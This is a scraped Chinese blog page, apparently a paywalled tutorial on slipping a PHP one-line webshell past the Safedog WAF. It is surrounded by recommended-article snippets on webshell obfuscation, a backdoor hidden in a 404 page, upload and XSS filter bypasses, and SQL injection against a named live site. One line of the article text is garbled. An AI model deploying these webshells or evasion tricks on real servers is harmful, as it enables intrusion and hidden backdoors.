WAF绕过--小马绕过

最新推荐文章于 2024-05-19 23:37:32 发布
最新推荐文章于 2024-05-19 23:37:32 发布
阅读量864 收藏 7
点赞数 1
分类专栏: zkaq靶场 文章标签: php 一句话木马 waf waf绕过 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116951246
版权

WAF绕过之小马免杀

WAF:安全狗-Apache版 v4

正常的PHP一句话木马:
<?php eval($_REQUEST[6]);?>

对于这个正常的一句话木马,安全狗会拦截。

关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配]

我们尝试只写<?php eval();?> 发现没有拦截,但是加了 R E Q U E S T [ 6 ] 就 拦 截 了 那 么 我 们 是 不 是 可 以 尝 试 测 试 看 看 究 竟 拦 截 _REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截 R

最低0.47元/天 解锁文章
wwxxee
关注
专栏目录
CTF writeup 1_网络安全实验室
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
waf免杀大马最新版.zip
08-21
渗透安全过安全狗各种WAF
php 编码绕过,WAF绕过方法之URL编码 | CN-SEC 中文网
weixin_30995661的博客
04-01 330
实例讲解如何利用URL编码绕过WAF防护SQL注入点http://www.magrabiyemen.com/contents.php?id=3字段数为4http://www.magrabiyemen.com/contents.php?id=3 order by 4显示位为4http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,...
WAF绕过(上)
最新发布
A526847的博客
05-19 661
或者$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");自增运算:因为在PHP中,'a'++ => 'b','b'++ => 'c',所以我们如果得到了其中的一个字母,通过这个字符就可以得到 所有的字母。
安恒月赛 image up
weixin_30900589的博客
11-30 563
http://101.71.29.5:10007/index.php?page=login 仔细观察这个url的话会发现,存在文件包含。 而且并没有login.php而是login,猜测代码是 <?php include str."php"; 随便账号密码就能登陆,来到了一个上传页面,只能上传图片,回头看看题目 这里的思路明确了,文件包含加图片马。 在这时间统一的世界里,上传图...
waf绕过之文件上传绕过、xss绕过以及查杀工具
weixin_46248422的博客
07-26 887
一、文件上传绕过: 方法一:等号绕过:在filename后面夹两个== 方法二:换行绕过:在文件后缀名处换行 方法三:填充垃圾字符 方法四五试过没有成功: 方法四:突破0,文件名前缀加[0x09]绕过 方法五:文件名去掉双引号绕过 二、XSS绕过WAF 1、大小写绕过 2、javascript伪协议 3、没有分号 4、Flash 5、HTML5 新标签 audio div等标签都可以绕过waf 6、Fuzz进行测试 7、双层标签绕过 CC防护对应有...
如何绕过检测上传php文件,shell上传绕过检测方法
weixin_36026440的博客
03-11 718
文件上传漏洞是所有漏洞中最为直接,有效的获取服务器权限的方法。但是想要利用好他并不容易,因为他的上传姿势实在是太过花哨(多)。所以这里介绍一些简单的上传姿势。望大牛误喷shell上传条件:1、上传点2、绝对路径3、要有权限文件上传检验姿势1、客户端javascript校验(一般只校验后缀名)2、服务端校验①文件头content-type字段校验(image/gif)②文件内容头校验(GIF89a)...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1786
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
PHP一句话木马小马
妖魔鬼怪快离开的博客
03-11 598
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[’ ‘]、$_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
渗透测试工具库-收藏版
baidu_38876334的博客
04-14 1040
浩二一开始做渗透测试的时候收集超多的资料和工具,一直在文档里吃灰。对BillGates Linux Botnet系木马活动的监控工具。
安恒12月赛Web题解
0verWatch的博客
12-22 2908
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2407
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
BUUCTF笔记之Web系列部分WriteUp(四)
热门推荐
克格莫(有需要的私信)
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
wuyun知识库目录
Grey的博客
01-15 8156
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24 1268.SQL注入关联分析2016-06-24 1267.Android安全开发之ZIP文件目录遍历2016-06-23 1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23 1265.签名加密破除-burp插件在app接口fuzz中的运用201
BUUCTF平台web writeup
a370793934的专栏
11-28 1554
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
WAF详解及WAF绕过
赤赤三的博客
03-20 9047
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
网络安全从入门到精通(第十章-6) ByPass(下) WebShell的绕过
划水的小白白
03-02 519
本文内容: ~Waf检测机制与绕过 ~进阶知识 ~结束语 每日一句: 每天进步一点点,持之以恒,终成大器 天行健,君子以自强不息! 一、Waf检测机制与绕过 1,正常一句马 <?php eval($_REQUEST['a']);?> //这种有个Waf都会给干掉 //多说一下,参数为数字也是可以的 <?php eval($_...
WAF绕过技术:冷门函数与策略规避详解
本文主要介绍了在信息安全领域,特别是针对Web应用程序防火墙(WAF)的绕过技术。这些技术涉及到数据库查询注入、编码转换、特殊语法利用和冷门函数的应用,目的是为了规避WAF的检测,实现攻击或漏洞利用。 在...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值